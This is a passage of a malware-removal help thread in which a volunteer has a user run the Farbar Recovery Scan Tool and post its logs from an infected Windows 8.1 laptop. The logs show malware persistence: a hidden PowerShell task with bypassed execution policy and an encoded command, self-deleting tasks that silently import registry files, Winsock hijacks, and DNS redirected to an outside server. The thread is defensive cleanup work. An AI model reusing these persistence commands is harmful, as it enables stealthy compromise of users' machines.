    Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
    Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand 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
    Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" & del "C:\ProgramData\Medlight\Physronwarm.reg" & SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
    Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
    Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
    Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
    Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
    Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
    Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
    Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
    Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
    Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
    Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
    Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" & del "C:\ProgramData\Medlight\Kay-Ity.reg" & SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
    Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
    Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
    Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
    Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
    Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
    Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
    Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
    Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
    Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
    Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
    Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
    Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
    Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
    Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
    Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
    Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
    Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
    Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)
    Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
    Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => powershell exe
    Task: C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => powershell exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)
     
  18. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    On top of a very heavy infection, we also have one system file infected, so I need to see if we have any healthy replacement.

    Re-run FRST again.
    Type the following in the edit box after "Search:".

    dnsapi.dll

    Click Search files button and post the log (Search.txt) it makes in your reply.
     
  19. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    You missed a part of the Addition.txt log just below this:

    so I'll need that too.
     
  20. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Sorry about the overlap - seems you gave me additional instructions but I didn't get them till after I posted the first log. I'll restart again with your additional instructions. Thx :)
     
  21. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    You don't need to restart to get those two things I need.
     
  22. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    So I looked at the Additional text log and there's nothing after it but I'll recopy if you'd like - just advise. Also, I reran it as per your instructions and have the search text log copied first (below) then the next will be the FRST log.

    Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
    Ran by owner (2016-01-10 19:22:38)
    Running from E:\
    Boot Mode: Safe Mode (minimal)

    ================== Search Files: "dnsapi.dll" =============

    C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll
    [2015-01-23 12:05][2014-11-04 17:20] 0498688 ____N (Microsoft Corporation) 205BDB00F4C032AF45A6BFD18EA7886C [File is digitally signed]

    C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
    [2014-11-21 01:16][2015-03-30 20:19] 0000202 ____A () D06D08FC499336D17F6E9F6E05847576 [File not signed]

    C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll
    [2015-01-23 12:05][2014-11-04 17:44] 0657920 ____N (Microsoft Corporation) 0B082D6D7A53D91678E7409DD145E89C [File is digitally signed]

    C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
    [2014-11-21 01:15][2015-03-29 13:33] 0000206 ____A () 056816A63C5C311231348A5F56F0A496 [File not signed]

    C:\Windows\SysWOW64\dnsapi.dll
    [2015-01-23 12:05][2015-01-23 12:05] 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59 [File not signed]

    C:\Windows\System32\dnsapi.dll
    [2015-01-23 12:05][2015-01-23 12:05] 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12 [File not signed]

    ====== End of Search ======
     
  23. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
    Ran by owner (administrator) on ACER (10-01-2016 19:30:04)
    Running from E:\
    Loaded Profiles: owner (Available Profiles: owner)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser not detected!)
    Boot Mode: Safe Mode (minimal)
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
    HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
    HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
    HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
    HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
    HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
    HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
    HKLM-x32\...\Run: [LManager] => [X]
    HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
    HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
    HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
    HKLM-x32\...\Run: [oasi_en_323010107] => [X]
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
    AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
    ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
    GroupPolicy: Restriction - Chrome <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
    Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
    Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
    Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
    SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
    FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
    FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
    FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
    FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    StartMenuInternet: FIREFOX.EXE - firefox.exe
     
  24. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Chrome:
    =======
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
    CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
    CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
    CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
    CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
    CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
    CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
    CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
    CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
    CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
    CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
    CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
    CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
    CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
    CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
